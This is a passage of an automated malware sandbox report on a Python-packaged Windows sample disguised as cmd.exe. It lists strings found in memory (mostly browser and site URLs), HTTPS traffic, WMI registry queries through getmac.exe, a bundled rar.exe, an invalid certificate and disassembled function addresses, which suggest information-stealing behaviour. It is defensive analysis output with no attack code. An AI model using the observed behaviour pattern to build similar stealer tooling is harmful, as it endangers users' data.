              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: cmd.exe, 00000001.00000003.1772966078.000001C91692E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1788462213.000001C91692E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1785608617.000001C916B44000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098986140.000001C9170A0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1758937487.000001C91688E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1758937487.000001C91688E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c
              Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: cmd.exe, 00000001.00000002.2100068134.000001C917A74000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2103626383.00007FFDFB414000.00000004.00000001.01000000.0000000F.sdmp, cmd.exe, 00000001.00000002.2102504128.00007FFDFB0B3000.00000004.00000001.01000000.00000010.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.drString found in binary or memory: https://www.openssl.org/H
              Source: cmd.exe, 00000000.00000003.1699462704.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1710533213.000001C9164F3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1711375061.000001C9164F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1707179329.000001C9164F3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1710834242.000001C9164F6000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
              Source: cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: cmd.exeProcess created: 50

              System Summary

              barindex
              Writes or reads registry keys via WMI
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A403A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,65_2_00007FF69A403A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,65_2_00007FF69A42B57C
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEF8BD00_2_00007FF70AEF8BD0
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF169D40_2_00007FF70AF169D4
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEF10000_2_00007FF70AEF1000
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF01BC00_2_00007FF70AF01BC0
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF15C700_2_00007FF70AF15C70
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF13C800_2_00007FF70AF13C80
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF164880_2_00007FF70AF16488
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF109380_2_00007FF70AF10938
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEFA34B0_2_00007FF70AEFA34B
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEFA4E40_2_00007FF70AEFA4E4
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF02C800_2_00007FF70AF02C80
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF03A140_2_00007FF70AF03A14
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF021D40_2_00007FF70AF021D4
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF019B40_2_00007FF70AF019B4
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF0DACC0_2_00007FF70AF0DACC
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF1411C0_2_00007FF70AF1411C
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF109380_2_00007FF70AF10938
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF081540_2_00007FF70AF08154
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF01FD00_2_00007FF70AF01FD0
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF017B00_2_00007FF70AF017B0
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF118E40_2_00007FF70AF118E4
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF0DF600_2_00007FF70AF0DF60
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF197980_2_00007FF70AF19798
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEF98700_2_00007FF70AEF9870
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF088040_2_00007FF70AF08804
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF036100_2_00007FF70AF03610
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF01DC40_2_00007FF70AF01DC4
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF05DA00_2_00007FF70AF05DA0
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF15EEC0_2_00007FF70AF15EEC
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF09F100_2_00007FF70AF09F10
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEFAD1D0_2_00007FF70AEFAD1D
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF0E5E00_2_00007FF70AF0E5E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98D0302710_2_00007FFD98D03027
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3EABA065_2_00007FF69A3EABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F0A2C65_2_00007FF69A3F0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A417B2465_2_00007FF69A417B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40AE1065_2_00007FF69A40AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F54C065_2_00007FF69A3F54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F118065_2_00007FF69A3F1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3E82F065_2_00007FF69A3E82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3E188465_2_00007FF69A3E1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3EB54065_2_00007FF69A3EB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A439B9865_2_00007FF69A439B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A424B3865_2_00007FF69A424B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F8C3065_2_00007FF69A3F8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A425C8C65_2_00007FF69A425C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3EDD0465_2_00007FF69A3EDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A436D0C65_2_00007FF69A436D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A409D0C65_2_00007FF69A409D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A410D2065_2_00007FF69A410D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40D97C65_2_00007FF69A40D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4269FD65_2_00007FF69A4269FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3E49B865_2_00007FF69A3E49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41FA6C65_2_00007FF69A41FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A425A7065_2_00007FF69A425A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3ECB1465_2_00007FF69A3ECB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A44AAC065_2_00007FF69A44AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A44AF9065_2_00007FF69A44AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A415F4C65_2_00007FF69A415F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41C00C65_2_00007FF69A41C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F303065_2_00007FF69A3F3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A424FE865_2_00007FF69A424FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A44DFD865_2_00007FF69A44DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41804065_2_00007FF69A418040
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41007465_2_00007FF69A410074
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40C05C65_2_00007FF69A40C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40010465_2_00007FF69A400104
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4400F065_2_00007FF69A4400F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A429D7465_2_00007FF69A429D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F1E0465_2_00007FF69A3F1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3EEE0865_2_00007FF69A3EEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A431DCC65_2_00007FF69A431DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3ECE8465_2_00007FF69A3ECE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42EEA465_2_00007FF69A42EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42AE5065_2_00007FF69A42AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43FE7465_2_00007FF69A43FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F8E6865_2_00007FF69A3F8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41AF0C65_2_00007FF69A41AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3E9EFC65_2_00007FF69A3E9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F236065_2_00007FF69A3F2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41037465_2_00007FF69A410374
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40C3E065_2_00007FF69A40C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42546865_2_00007FF69A425468
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40D45865_2_00007FF69A40D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3EA50465_2_00007FF69A3EA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42216465_2_00007FF69A422164
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3FE21C65_2_00007FF69A3FE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4281CC65_2_00007FF69A4281CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4441CC65_2_00007FF69A4441CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4202A465_2_00007FF69A4202A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40724465_2_00007FF69A407244
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3EF24C65_2_00007FF69A3EF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43226865_2_00007FF69A432268
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43131465_2_00007FF69A431314
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43832C65_2_00007FF69A43832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3FD2C065_2_00007FF69A3FD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3E42E065_2_00007FF69A3E42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F17C865_2_00007FF69A3F17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4067E065_2_00007FF69A4067E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3E888465_2_00007FF69A3E8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F289065_2_00007FF69A3F2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4318A865_2_00007FF69A4318A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42190C65_2_00007FF69A42190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41090465_2_00007FF69A410904
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41D91C65_2_00007FF69A41D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4138E865_2_00007FF69A4138E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40F5B065_2_00007FF69A40F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F859865_2_00007FF69A3F8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41F59C65_2_00007FF69A41F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43260C65_2_00007FF69A43260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4165FC65_2_00007FF69A4165FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43766065_2_00007FF69A437660
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41A71065_2_00007FF69A41A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42071065_2_00007FF69A420710
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42270065_2_00007FF69A422700
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F86C465_2_00007FF69A3F86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4486D465_2_00007FF69A4486D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: String function: 00007FF69A3F8444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: String function: 00007FF69A4249F4 appears 53 times
              Source: C:\Users\user\Desktop\cmd.exeCode function: String function: 00007FF70AEF2710 appears 52 times
              Source: cmd.exeStatic PE information: invalid certificate
              Source: cmd.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: cmd.exeBinary or memory string: OriginalFilename vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000000.1697422056.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWPR.exen' vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs cmd.exe
              Source: cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2107385871.00007FFE130CC000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2107110070.00007FFE126F3000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2104939736.00007FFE0146E000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs cmd.exe
              Source: cmd.exe, 00000001.00000000.1702552927.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWPR.exen' vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2105244168.00007FFE0EB6D000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2104535149.00007FFDFB8A0000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2106592817.00007FFE11EEC000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2102050539.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2103626383.00007FFDFB414000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2102504128.00007FFDFB0B3000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2108506409.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs cmd.exe
